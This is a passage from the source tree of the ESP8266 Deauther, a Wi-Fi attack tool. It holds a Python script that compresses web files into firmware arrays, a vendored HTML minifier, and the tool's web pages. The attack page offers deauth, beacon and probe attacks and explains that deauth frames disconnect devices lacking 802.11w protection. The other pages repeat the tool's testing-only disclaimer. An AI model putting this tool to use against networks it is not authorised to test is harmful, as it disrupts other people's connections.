elif x.suffix == ".lang":
lang_files.append(x)
for file in html_files:
base_file = os.path.basename(str(file))
original_file = str(file)
new_file = str(os.path.join(str(compressed), str(base_file)))
print("[+] Minifying " + base_file + "...")
process_single_html_file(original_file, output_path=new_file)
print("[+] Compressing " + base_file + "...")
f_in = open(new_file, encoding='UTF-8')
content = f_in.read()
f_in.close()
os.remove(new_file)
with gzip.GzipFile(new_file + ".gz", mode='w') as fo:
fo.write(content.encode("UTF-8"))
f_in = open(new_file + ".gz", 'rb')
content = f_in.read()
f_in.close()
array_name = base_file.replace(".", "")
hex_formatted_content = ""
hex_content = binascii.hexlify(content)
hex_content = hex_content.decode("UTF-8")
hex_content = [hex_content[i:i+2] for i in range(0, len(hex_content), 2)]
for char in hex_content:
hex_formatted_content += "0x" + char + ", "
hex_formatted_content = hex_formatted_content[:-2]
progmem_definitions += "const char " + array_name + "[] PROGMEM = {" + hex_formatted_content + "};\n"
copy_files_function += ' if(!LittleFS.exists("/web/' + base_file + '.gz") || force) progmemToSpiffs(' + array_name + ', sizeof(' + array_name + '), "/web/' + base_file + '.gz");\n'
webserver_events += 'server.on("/' + base_file + '", HTTP_GET, [](){\n sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_HTML);\n});\n'
for file in css_files:
base_file = os.path.basename(str(file))
original_file = str(file)
new_file = str(os.path.join(str(compressed), str(base_file)))
print("[+] Minifying " + base_file + "...")
process_single_css_file(original_file, output_path=new_file)
print("[+] Compressing " + base_file + "...")
f_in = open(new_file, encoding='UTF-8')
content = f_in.read()
f_in.close()
os.remove(new_file)
with gzip.GzipFile(new_file + ".gz", mode='w') as fo:
fo.write(content.encode("UTF-8"))
f_in = open(new_file + ".gz", 'rb')
content = f_in.read()
f_in.close()
array_name = base_file.replace(".", "")
hex_formatted_content = ""
hex_content = binascii.hexlify(content)
hex_content = hex_content.decode("UTF-8")
hex_content = [hex_content[i:i+2] for i in range(0, len(hex_content), 2)]
for char in hex_content:
hex_formatted_content += "0x" + char + ", "
hex_formatted_content = hex_formatted_content[:-2]
progmem_definitions += "const char " + array_name + "[] PROGMEM = {" + hex_formatted_content + "};\n"
copy_files_function += ' if(!LittleFS.exists("/web/' + base_file + '.gz") || force) progmemToSpiffs(' + array_name + ', sizeof(' + array_name + '), "/web/' + base_file + '.gz");\n'
webserver_events += 'server.on("/' + base_file + '", HTTP_GET, [](){\n sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_CSS);\n});\n'
for file in js_files:
q = PurePath('js')
compressed_js = compressed / q
if not os.path.exists(str(compressed_js)):
os.mkdir(str(compressed_js))
base_file = os.path.basename(str(file))
original_file = str(file)
new_file = str(os.path.join(str(compressed_js), str(base_file)))
#print("[+] Minifying " + base_file + "...")
#process_single_js_file(original_file, output_path=new_file)
print("[+] Compressing " + base_file + "...")
f_in = open(original_file, encoding='UTF-8')
content = f_in.read()
f_in.close()
#os.remove(new_file)
with gzip.GzipFile(new_file + ".gz", mode='w') as fo:
fo.write(content.encode("UTF-8"))
f_in = open(new_file + ".gz", 'rb')
content = f_in.read()
f_in.close()
array_name = base_file.replace(".", "")
hex_formatted_content = ""
hex_content = binascii.hexlify(content)
hex_content = hex_content.decode("UTF-8")
hex_content = [hex_content[i:i+2] for i in range(0, len(hex_content), 2)]
for char in hex_content:
hex_formatted_content += "0x" + char + ", "
hex_formatted_content = hex_formatted_content[:-2]
progmem_definitions += "const char " + array_name + "[] PROGMEM = {" + hex_formatted_content + "};\n"
copy_files_function += ' if(!LittleFS.exists("/web/js/' + base_file + '.gz") || force) progmemToSpiffs(' + array_name + ', sizeof(' + array_name + '), "/web/js/' + base_file + '.gz");\n'
webserver_events += 'server.on("/js/' + base_file + '", HTTP_GET, [](){\n sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_JS);\n});\n'
for file in lang_files:
q = PurePath('lang')
compressed_lang = compressed / q
if not os.path.exists(str(compressed_lang)):
os.mkdir(str(compressed_lang))
base_file = os.path.basename(str(file))
original_file = str(file)
new_file = str(os.path.join(str(compressed_lang), str(base_file)))
print("[+] Compressing " + base_file + "...")
f_in = open(original_file, encoding='UTF-8')
content = f_in.read()
f_in.close()
with gzip.GzipFile(new_file + ".gz", mode='w') as fo:
fo.write(content.encode("UTF-8"))
f_in = open(new_file + ".gz", 'rb')
content = f_in.read()
f_in.close()
array_name = base_file.replace(".", "")
lang_name = base_file.replace(".lang", "")
hex_formatted_content = ""
hex_content = binascii.hexlify(content)
hex_content = hex_content.decode("UTF-8")
hex_content = [hex_content[i:i+2] for i in range(0, len(hex_content), 2)]
for char in hex_content:
hex_formatted_content += "0x" + char + ", "
hex_formatted_content = hex_formatted_content[:-2]
progmem_definitions += "const char " + array_name + "[] PROGMEM = {" + hex_formatted_content + "};\n"
copy_files_function += ' if(!LittleFS.exists("/web/lang/' + base_file + '.gz") || force) progmemToSpiffs(' + array_name + ', sizeof(' + array_name + '), "/web/lang/' + base_file + '.gz");\n'
webserver_events += 'server.on("/lang/' + base_file + '", HTTP_GET, [](){\n sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_JSON);\n});\n'
if(len(load_lang) > 0):
load_lang += ' else if(String(settings::getWebSettings().lang) == "'+lang_name+'") sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_JSON);\n'
else:
load_lang += ' if(String(settings::getWebSettings().lang) == "'+lang_name+'") sendProgmem(' + array_name + ', sizeof(' + array_name + '), W_JSON);\n'
base_file = os.path.basename(license_file_path)
new_file = str(os.path.join(str(compressed), str("LICENSE")))
print("[+] Compressing " + base_file + "...")
f_in = open(license_file_path, encoding='UTF-8')
content = f_in.read()
f_in.close()
with gzip.GzipFile(new_file + ".gz", mode='w') as fo:
fo.write(content.encode("UTF-8"))
f_in = open(new_file + ".gz", 'rb')
content = f_in.read()
f_in.close()
array_name = base_file.replace(".", "")
hex_formatted_content = ""
hex_content = binascii.hexlify(content)
hex_content = hex_content.decode("UTF-8")
hex_content = [hex_content[i:i+2] for i in range(0, len(hex_content), 2)]
for char in hex_content:
hex_formatted_content += "0x" + char + ", "
hex_formatted_content = hex_formatted_content[:-2]
progmem_definitions += "const char " + array_name + "[] PROGMEM = {" + hex_formatted_content + "};\n"
copy_files_function += ' if(!LittleFS.exists("/web/' + base_file + '.gz") || force) progmemToSpiffs(' + array_name + ', sizeof(' + array_name + '), "/web/' + base_file + '.gz");\n'
print("[+] Saving everything into webfiles.h...")
f = open(arduino_file_path, 'w')
f.write("#ifndef webfiles_h\n")
f.write("#define webfiles_h\n")
f.write("\n")
f.write("// comment that out if you want to save program memory and know how to upload the web files to the SPIFFS manually\n")
f.write("#define USE_PROGMEM_WEB_FILES \n")
f.write("\n")
f.write("#ifdef USE_PROGMEM_WEB_FILES\n")
f.write(progmem_definitions)
f.write("#endif\n")
f.write("\n")
f.write("void copyWebFiles(bool force){\n")
f.write("#ifdef USE_PROGMEM_WEB_FILES\n")
f.write("if(settings::getWebSettings().use_spiffs){\n")
f.write(copy_files_function)
f.write("}\n")
f.write("#endif\n")
f.write("}\n")
f.write("\n")
f.write("#endif")
f.close()
print("\n[+] Done, happy uploading :)")
print("Here are the updated functions for wifi.cpp, in case you added or removed files:")
print();
print('if(!settings::getWebSettings().use_spiffs){')
print(' server.on("/", HTTP_GET, [](){')
print(' sendProgmem(indexhtml, sizeof(indexhtml), W_HTML);')
print('});')
print(webserver_events)
print('}')
print('server.on("/lang/default.lang", HTTP_GET, [](){')
print(" if(!settings::getWebSettings().use_spiffs){")
print(load_lang)
print(' else handleFileRead("/web/lang/"+String(settings::getWebSettings().lang)+".lang");')
print(' } else {')
print(' handleFileRead("/web/lang/"+String(settings::getWebSettings().lang)+".lang");')
print(' }')
print("});") |
Python | esp8266_deauther-2/utils/web_converter/css_html_js_minify/html_minifier.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Created by: juancarlospaco
# GitHub Repo: https://github.com/juancarlospaco/css-html-js-minify
"""HTML Minifier functions for CSS-HTML-JS-Minify."""
import re
import logging as log
__all__ = ['html_minify']
def condense_html_whitespace(html):
"""Condense HTML, but be safe first if it have textareas or pre tags.
>>> condense_html_whitespace('<i> <b> <a> test </a> </b> </i><br>')
'<i><b><a> test </a></b></i><br>'
""" # first space between tags, then empty new lines and in-between.
log.debug("Removing unnecessary HTML White Spaces and Empty New Lines.")
tagsStack = []
split = re.split('(<\\s*pre.*>|<\\s*/\\s*pre\\s*>|<\\s*textarea.*>|<\\s*/\\s*textarea\\s*>)', html, flags=re.IGNORECASE)
for i in range(0, len(split)):
#if we are on a tag
if (i + 1) % 2 == 0:
tag = rawtag(split[i])
if tag.startswith('/'):
if not tagsStack or '/' + tagsStack.pop() != tag:
raise Exception("Some tag is not closed properly")
else:
tagsStack.append(tag)
continue
#else check if we are outside any nested <pre>/<textarea> tag
if not tagsStack:
temp = re.sub(r'>\s+<', '> <', split[i])
split[i] = re.sub(r'\s{2,}|[\r\n]', ' ', temp)
return ''.join(split)
def rawtag(str):
if re.match('<\\s*pre.*>', str, flags=re.IGNORECASE):
return 'pre'
if re.match('<\\s*textarea.*>', str, flags=re.IGNORECASE):
return 'txt'
if re.match('<\\s*/\\s*pre\\s*>', str, flags=re.IGNORECASE):
return '/pre'
if re.match('<\\s*/\\s*textarea\\s*>', str, flags=re.IGNORECASE):
return '/txt'
def condense_style(html):
"""Condense style html tags.
>>> condense_style('<style type="text/css">*{border:0}</style><p>a b c')
'<style>*{border:0}</style><p>a b c'
""" # May look silly but Emmet does this and is wrong.
log.debug("Condensing HTML Style CSS tags.")
return html.replace('<style type="text/css">', '<style>').replace(
"<style type='text/css'>", '<style>').replace(
"<style type=text/css>", '<style>')
def condense_script(html):
"""Condense script html tags.
>>> condense_script('<script type="text/javascript"> </script><p>a b c')
'<script> </script><p>a b c'
""" # May look silly but Emmet does this and is wrong.
log.debug("Condensing HTML Script JS tags.")
return html.replace('<script type="text/javascript">', '<script>').replace(
"<style type='text/javascript'>", '<script>').replace(
"<style type=text/javascript>", '<script>')
def clean_unneeded_html_tags(html):
"""Clean unneeded optional html tags.
>>> clean_unneeded_html_tags('a<body></img></td>b</th></tr></hr></br>c')
'abc'
"""
log.debug("Removing unnecessary optional HTML tags.")
for tag_to_remove in ("""</area> </base> <body> </body> </br> </col>
</colgroup> </dd> </dt> <head> </head> </hr> <html> </html> </img>
</input> </li> </link> </meta> </option> </param> <tbody> </tbody>
</td> </tfoot> </th> </thead> </tr> </basefont> </isindex> </param>
""".split()):
html = html.replace(tag_to_remove, '')
return html # May look silly but Emmet does this and is wrong.
def remove_html_comments(html):
"""Remove all HTML comments, Keep all for Grunt, Grymt and IE.
>>> _="<!-- build:dev -->a<!-- endbuild -->b<!--[if IE 7]>c<![endif]--> "
>>> _+= "<!-- kill me please -->keep" ; remove_html_comments(_)
'<!-- build:dev -->a<!-- endbuild -->b<!--[if IE 7]>c<![endif]--> keep'
""" # Grunt uses comments to as build arguments, bad practice but still.
log.debug("""Removing all unnecessary HTML comments; Keep all containing:
'build:', 'endbuild', '<!--[if]>', '<![endif]-->' for Grunt/Grymt, IE.""")
return re.compile('<!-- [^(build|endbuild)].*? -->', re.I).sub('', html)
def unquote_html_attributes(html):
"""Remove all HTML quotes on attibutes if possible.
>>> unquote_html_attributes('<img width="9" height="5" data-foo="0" >')
'<img width=9 height=5 data-foo=0 >'
""" # data-foo=0> might cause errors on IE, we leave 1 space data-foo=0 >
log.debug("Removing unnecessary Quotes on attributes of HTML tags.")
# cache all regular expressions on variables before we enter the for loop.
any_tag = re.compile(r"<\w.*?>", re.I | re.MULTILINE | re.DOTALL)
space = re.compile(r' \s+|\s +', re.MULTILINE)
space1 = re.compile(r'\w\s+\w', re.MULTILINE)
space2 = re.compile(r'"\s+>', re.MULTILINE)
space3 = re.compile(r"'\s+>", re.MULTILINE)
space4 = re.compile('"\s\s+\w+="|\'\s\s+\w+=\'|"\s\s+\w+=|\'\s\s+\w+=',
re.MULTILINE)
space6 = re.compile(r"\d\s+>", re.MULTILINE)
quotes_in_tag = re.compile('([a-zA-Z]+)="([a-zA-Z0-9-_\.]+)"')
# iterate on a for loop cleaning stuff up on the html markup.
for tag in iter(any_tag.findall(html)):
# exceptions of comments and closing tags
if tag.startswith('<!') or tag.find('</') > -1:
continue
original = tag
# remove white space inside the tag itself
tag = space2.sub('" >', tag) # preserve 1 white space is safer
tag = space3.sub("' >", tag)
for each in space1.findall(tag) + space6.findall(tag):
tag = tag.replace(each, space.sub(' ', each))
for each in space4.findall(tag):
tag = tag.replace(each, each[0] + ' ' + each[1:].lstrip())
# remove quotes on some attributes
tag = quotes_in_tag.sub(r'\1=\2 ', tag) # See Bug #28
if original != tag: # has the tag been improved ?
html = html.replace(original, tag)
return html.strip()
def html_minify(html, comments=False):
"""Minify HTML main function.
>>> html_minify(' <p width="9" height="5" > <!-- a --> b </p> c <br> ')
'<p width=9 height=5 > b c <br>'
"""
log.info("Compressing HTML...")
html = remove_html_comments(html) if not comments else html
html = condense_style(html)
html = condense_script(html)
html = clean_unneeded_html_tags(html)
html = condense_html_whitespace(html)
html = unquote_html_attributes(html)
log.info("Finished compressing HTML !.")
return html.strip() |
Python | esp8266_deauther-2/utils/web_converter/css_html_js_minify/variables.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Created by: juancarlospaco
# GitHub Repo: https://github.com/juancarlospaco/css-html-js-minify
"""Variables for CSS processing for CSS-HTML-JS-Minify."""
# 'Color Name String': (R, G, B)
EXTENDED_NAMED_COLORS = {
'azure': (240, 255, 255),
'beige': (245, 245, 220),
'bisque': (255, 228, 196),
'blanchedalmond': (255, 235, 205),
'brown': (165, 42, 42),
'burlywood': (222, 184, 135),
'chartreuse': (127, 255, 0),
'chocolate': (210, 105, 30),
'coral': (255, 127, 80),
'cornsilk': (255, 248, 220),
'crimson': (220, 20, 60),
'cyan': (0, 255, 255),
'darkcyan': (0, 139, 139),
'darkgoldenrod': (184, 134, 11),
'darkgray': (169, 169, 169),
'darkgreen': (0, 100, 0),
'darkgrey': (169, 169, 169),
'darkkhaki': (189, 183, 107),
'darkmagenta': (139, 0, 139),
'darkolivegreen': (85, 107, 47),
'darkorange': (255, 140, 0),
'darkorchid': (153, 50, 204),
'darkred': (139, 0, 0),
'darksalmon': (233, 150, 122),
'darkseagreen': (143, 188, 143),
'darkslategray': (47, 79, 79),
'darkslategrey': (47, 79, 79),
'darkturquoise': (0, 206, 209),
'darkviolet': (148, 0, 211),
'deeppink': (255, 20, 147),
'dimgray': (105, 105, 105),
'dimgrey': (105, 105, 105),
'firebrick': (178, 34, 34),
'forestgreen': (34, 139, 34),
'gainsboro': (220, 220, 220),
'gold': (255, 215, 0),
'goldenrod': (218, 165, 32),
'gray': (128, 128, 128),
'green': (0, 128, 0),
'grey': (128, 128, 128),
'honeydew': (240, 255, 240),
'hotpink': (255, 105, 180),
'indianred': (205, 92, 92),
'indigo': (75, 0, 130),
'ivory': (255, 255, 240),
'khaki': (240, 230, 140),
'lavender': (230, 230, 250),
'lavenderblush': (255, 240, 245),
'lawngreen': (124, 252, 0),
'lemonchiffon': (255, 250, 205),
'lightcoral': (240, 128, 128),
'lightcyan': (224, 255, 255),
'lightgray': (211, 211, 211),
'lightgreen': (144, 238, 144),
'lightgrey': (211, 211, 211),
'lightpink': (255, 182, 193),
'lightsalmon': (255, 160, 122),
'lightseagreen': (32, 178, 170),
'lightslategray': (119, 136, 153),
'lightslategrey': (119, 136, 153),
'lime': (0, 255, 0),
'limegreen': (50, 205, 50),
'linen': (250, 240, 230),
'magenta': (255, 0, 255),
'maroon': (128, 0, 0),
'mediumorchid': (186, 85, 211),
'mediumpurple': (147, 112, 219),
'mediumseagreen': (60, 179, 113),
'mediumspringgreen': (0, 250, 154),
'mediumturquoise': (72, 209, 204),
'mediumvioletred': (199, 21, 133),
'mintcream': (245, 255, 250),
'mistyrose': (255, 228, 225),
'moccasin': (255, 228, 181),
'navy': (0, 0, 128),
'oldlace': (253, 245, 230),
'olive': (128, 128, 0),
'olivedrab': (107, 142, 35),
'orange': (255, 165, 0),
'orangered': (255, 69, 0),
'orchid': (218, 112, 214),
'palegoldenrod': (238, 232, 170),
'palegreen': (152, 251, 152),
'paleturquoise': (175, 238, 238),
'palevioletred': (219, 112, 147),
'papayawhip': (255, 239, 213),
'peachpuff': (255, 218, 185),
'peru': (205, 133, 63),
'pink': (255, 192, 203),
'plum': (221, 160, 221),
'purple': (128, 0, 128),
'rosybrown': (188, 143, 143),
'saddlebrown': (139, 69, 19),
'salmon': (250, 128, 114),
'sandybrown': (244, 164, 96),
'seagreen': (46, 139, 87),
'seashell': (255, 245, 238),
'sienna': (160, 82, 45),
'silver': (192, 192, 192),
'slategray': (112, 128, 144),
'slategrey': (112, 128, 144),
'snow': (255, 250, 250),
'springgreen': (0, 255, 127),
'teal': (0, 128, 128),
'thistle': (216, 191, 216),
'tomato': (255, 99, 71),
'turquoise': (64, 224, 208),
'violet': (238, 130, 238),
'wheat': (245, 222, 179)
}
# Do Not compact this string, new lines are used to Group up stuff.
CSS_PROPS_TEXT = '''
alignment-adjust alignment-baseline animation animation-delay
animation-direction animation-duration animation-iteration-count
animation-name animation-play-state animation-timing-function appearance
azimuth
backface-visibility background background-blend-mode background-attachment
background-clip background-color background-image background-origin
background-position background-position-block background-position-inline
background-position-x background-position-y background-repeat background-size
baseline-shift bikeshedding bookmark-label bookmark-level bookmark-state
bookmark-target border border-bottom border-bottom-color
border-bottom-left-radius border-bottom-parts border-bottom-right-radius
border-bottom-style border-bottom-width border-clip border-clip-top
border-clip-right border-clip-bottom border-clip-left border-collapse
border-color border-corner-shape border-image border-image-outset
border-image-repeat border-image-slice border-image-source border-image-width
border-left border-left-color border-left-style border-left-parts
border-left-width border-limit border-parts border-radius border-right
border-right-color border-right-style border-right-width border-right-parts
border-spacing border-style border-top border-top-color border-top-left-radius
border-top-parts border-top-right-radius border-top-style border-top-width
border-width bottom box-decoration-break box-shadow box-sizing
caption-side clear clip color column-count column-fill column-gap column-rule
column-rule-color column-rule-style column-rule-width column-span column-width
columns content counter-increment counter-reset corners corner-shape
cue cue-after cue-before cursor
direction display drop-initial-after-adjust drop-initial-after-align
drop-initial-before-adjust drop-initial-before-align drop-initial-size
drop-initial-value
elevation empty-cells
flex flex-basis flex-direction flex-flow flex-grow flex-shrink flex-wrap fit
fit-position float font font-family font-size font-size-adjust font-stretch
font-style font-variant font-weight
grid-columns grid-rows
justify-content
hanging-punctuation height hyphenate-character hyphenate-resource hyphens
icon image-orientation image-resolution inline-box-align
left letter-spacing line-height line-stacking line-stacking-ruby
line-stacking-shift line-stacking-strategy linear-gradient list-style
list-style-image list-style-position list-style-type
margin margin-bottom margin-left margin-right margin-top marquee-direction
marquee-loop marquee-speed marquee-style max-height max-width min-height
min-width
nav-index
opacity orphans outline outline-color outline-offset outline-style
outline-width overflow overflow-style overflow-x overflow-y
padding padding-bottom padding-left padding-right padding-top page
page-break-after page-break-before page-break-inside pause pause-after
pause-before perspective perspective-origin pitch pitch-range play-during
position presentation-level
quotes
resize rest rest-after rest-before richness right rotation rotation-point
ruby-align ruby-overhang ruby-position ruby-span
size speak speak-header speak-numeral speak-punctuation speech-rate src
stress string-set
table-layout target target-name target-new target-position text-align
text-align-last text-decoration text-emphasis text-indent text-justify
text-outline text-shadow text-transform text-wrap top transform
transform-origin transition transition-delay transition-duration
transition-property transition-timing-function
unicode-bidi unicode-range
vertical-align visibility voice-balance voice-duration voice-family
voice-pitch voice-range voice-rate voice-stress voice-volume volume
white-space widows width word-break word-spacing word-wrap
z-index
''' |
Python | esp8266_deauther-2/utils/web_converter/css_html_js_minify/__init__.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Created by: juancarlospaco
# GitHub Repo: https://github.com/juancarlospaco/css-html-js-minify
"""CSS-HTML-JS-Minify.
Minifier for the Web.
"""
from .minify import (process_single_html_file, process_single_js_file,
process_single_css_file, html_minify, js_minify,
css_minify)
__version__ = '2.5.0'
__license__ = 'GPLv3+ LGPLv3+'
__author__ = 'Juan Carlos'
__email__ = 'juancarlospaco@gmail.com'
__url__ = 'https://github.com/juancarlospaco/css-html-js-minify'
__source__ = ('https://raw.githubusercontent.com/juancarlospaco/'
'css-html-js-minify/master/css-html-js-minify.py')
__all__ = ['__version__', '__license__', '__author__',
'__email__', '__url__', '__source__',
'process_single_html_file', 'process_single_js_file',
'process_single_css_file', 'html_minify', 'js_minify',
'css_minify', 'minify'] |
HTML | esp8266_deauther-2/web_interface/attack.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
<script src="js/attack.js"></script>
</head>
<body onload="loadLang()">
<nav>
<ul class="menu">
<li><a href="scan.html" data-translate="scan">Scan</a></li>
<li><a href="ssids.html" data-translate="ssids">SSIDs</a></li>
<li><a href="attack.html" data-translate="attacks">Attack</a></li>
<li><a href="settings.html" data-translate="settings">Settings</a></li>
</ul>
</nav>
<div id="status"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header" data-translate="attacks">Attacks</h1>
<p>
<span class="red" data-translate="info_span">INFO:</span><br>
<span data-translate="attack_info">
- You might lose connection when starting an attack!<br>
- You need to select a target for the deauth attack.<br>
- You need a saved SSID for the beacon and probe attack.<br>
- Click reload to refresh the packet rate.<br>
</span>
<span data-translate="info_disclaimer">In case of an unexpected error, please reload the site and
look at the serial monitor for further debugging.</span><br>
</p>
<p class="right">
<button onclick="stopAll()" data-translate="stop">stop</button>
<button onclick="load()" data-translate="reload">reload</button>
</p>
<table>
<tr>
<th data-translate="attacks">Attacks</th>
<th data-translate="targets">Targets</th>
<th>Pkts/s</th>
<th data-translate="start_stop">START / STOP</th>
</tr>
<tr>
<td>Deauth</td>
<td id="deauthTargets">0</td>
<td id="deauthPkts">0/0</td>
<td><button id="deauth" onclick="start(0)" class="select" data-translate="start">START</button>
</td>
</tr>
<tr>
<td>Beacon</td>
<td id="beaconTargets">0</td>
<td id="beaconPkts">0/0</td>
<td><button id="beacon" onclick="start(1)" class="select" data-translate="start">START</button>
</td>
</tr>
<tr>
<td>Probe</td>
<td id="probeTargets">0</td>
<td id="probePkts">0/0</td>
<td><button id="probe" onclick="start(2)" class="select" data-translate="start">START</button>
</td>
</tr>
<tr>
<td colspan="2">All Pkts/s:</td>
<td colspan="2" id="allpkts">0</td>
</tr>
</table>
<h2>Deauth</h2>
<p data-translate="deauth_desc">
Closes the connection of WiFi devices by sending deauthentication frames to access points and client
devices you selected.<br>
This is only possible because a lot of devices don't use the 802.11w-2009 standard that offers a
protection against this attack.<br>
Please only select one target! When you select multiple targets that run on different channels and
start the attack,
it will quickly switch between those channels and you have no chance to reconnect to the access
point that hosts this web interface.
</p>
<h2>Beacon</h2>
<p data-translate="beacon_desc">
Beacon packets are used to advertise access points. By continuously sending beacon packets out, it
will look like you created new WiFi networks.<br>
You can specify the network names under SSIDs.<br>
</p>
<h2>Probe</h2>
<p data-translate="probe_desc">
Probe requests are sent by client devices to ask if a known network is nearby.<br>
Use this attack to confuse WiFi trackers by asking for networks that you specified in the SSID
list.<br>
It's unlikely you will see any impact by this attack with your home network.<br>
</p>
</div>
</div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
HTML | esp8266_deauther-2/web_interface/index.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
</head>
<body onload="loadLang()">
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header" data-translate="warning">WARNING</h1>
<p class="centered" data-translate="disclaimer">
This project is a proof of concept for testing and educational purposes.<br>
Neither the ESP8266, nor its SDK was meant or build for such purposes. Bugs can occur!<br>
<br>
Use it only against your own networks and devices!<br>
<br>
It uses valid Wi-Fi frames described in the IEEE 802.11 standard and does not block or disrupt any
frequencies.<br>
Please check the legal regulations in your country before using it.<br>
<br>
Please don't refer to this project as "jammer", as it undermines the real purpose of this
project!<br>
If you do, it only proves that you didn't understand anything of what this project stands for.<br>
Publishing content about this without without a proper explanation shows that you only do it for the
clicks,
fame and/or money and have no respect for intellectual property, the community behind it and the
fight for a better WiFi standard.<br>
<br>
For more information visit:<br>
<a
href="https://github.com/spacehuhntech/esp8266_deauther">github.com/spacehuhntech/esp8266_deauther</a>
</p>
<p class="centered bold">
<a class="button" href="scan.html" data-translate="disclaimer-button">I have read and understood the
notice above</a>
</p>
</div>
</div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
HTML | esp8266_deauther-2/web_interface/info.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
</head>
<body onload="loadLang()">
<nav>
<ul class="menu">
<li><a href="scan.html" data-translate="scan">Scan</a></li>
<li><a href="ssids.html" data-translate="ssids">SSIDs</a></li>
<li><a href="attack.html" data-translate="attacks">Attack</a></li>
<li><a href="settings.html" data-translate="settings">Settings</a></li>
</ul>
</nav>
<div id="status"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header">Credits</h1>
<h2>Disclaimer</h2>
<p data-translate="disclaimer">
This project is a proof of concept for testing and educational purposes.<br>
Neither the ESP8266, nor its SDK was meant or build for such purposes. Bugs can occur!<br>
<br>
Use it only against your own networks and devices!<br>
<br>
It uses valid Wi-Fi frames described in the IEEE 802.11 standard and does not block or disrupt any
frequencies.<br>
Please check the legal regulations in your country before using it.<br>
<br>
Please don't refer to this project as "jammer", as it undermines the real purpose of this
project!<br>
If you do, it only proves that you didn't understand anything of what this project stands for.<br>
Publishing content about this without without a proper explanation shows that you only do it for the
clicks,
fame and/or money and have no respect for intellectual property, the community behind it and the
fight for a better WiFi standard.<br>
<br>
For more information visit:<br>
<a
href="https://github.com/spacehuhntech/esp8266_deauther">github.com/spacehuhntech/esp8266_deauther</a>
</p>
<h2>Acknowledgements</h2>
<p>
A huge thanks to:<br>
<ul>
<li><a href="http://github.com/deantonious" target="_blank">@deantonious</a></li>
<li><a href="http://github.com/jLynx" target="_blank">@jLynx</a></li>
<li><a href="http://github.com/lspoplove" target="_blank">@lspoplove</a></li>
<li><a href="http://github.com/schinfo" target="_blank">@schinfo</a></li>
<li><a href="http://github.com/tobozo" target="_blank">@tobozo</a></li>
<li><a href="http://github.com/xdavidhu" target="_blank">@xdavidhu</a></li>
<li><a href="http://github.com/PwnKitteh" target="_blank">@PwnKitteh</a></li>
</ul>
for helping out with various things regarding this project and keeping it alive!<br>
<br>
Also thanks to everyone working on the libraries used for this project:<br>
<ul>
<li><a href="https://github.com/ThingPulse/esp8266-oled-ssd1306"
target="_blank">esp8266-oled-ssd1306</a></li>
<li><a href="https://github.com/bblanchon/ArduinoJson" target="_blank">ArduinoJson</a></li>
<li><a href="https://github.com/adafruit/Adafruit_DotStar" target="_blank">Adafruit DotStar</a></li>
<li><a href="https://github.com/adafruit/Adafruit_NeoPixel" target="_blank">Adafruit NeoPixel</a>
</li>
<li><a href="https://github.com/NorthernWidget/DS3231" target="_blank">DS3231</a></li>
<li><a href="https://github.com/xoseperez/my92xx" target="_blank">my92xx</a></li>
</ul>
We also thank Espressif and their community for this awesome chip and all the software and
hardware projects around it and the countless tutorials you can find online!<br>
</p>
<h2>License</h2>
<p>
<b>In regards to the firmware:</b><br>
<br>
MIT License<br>
Copyright (c) 2020 Spacehuhn Technologies<br>
<br>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:<br>
<br>
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.<br>
<br>
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES
OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
</p>
</div>
</div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
JSON | esp8266_deauther-2/web_interface/names.json | [
[
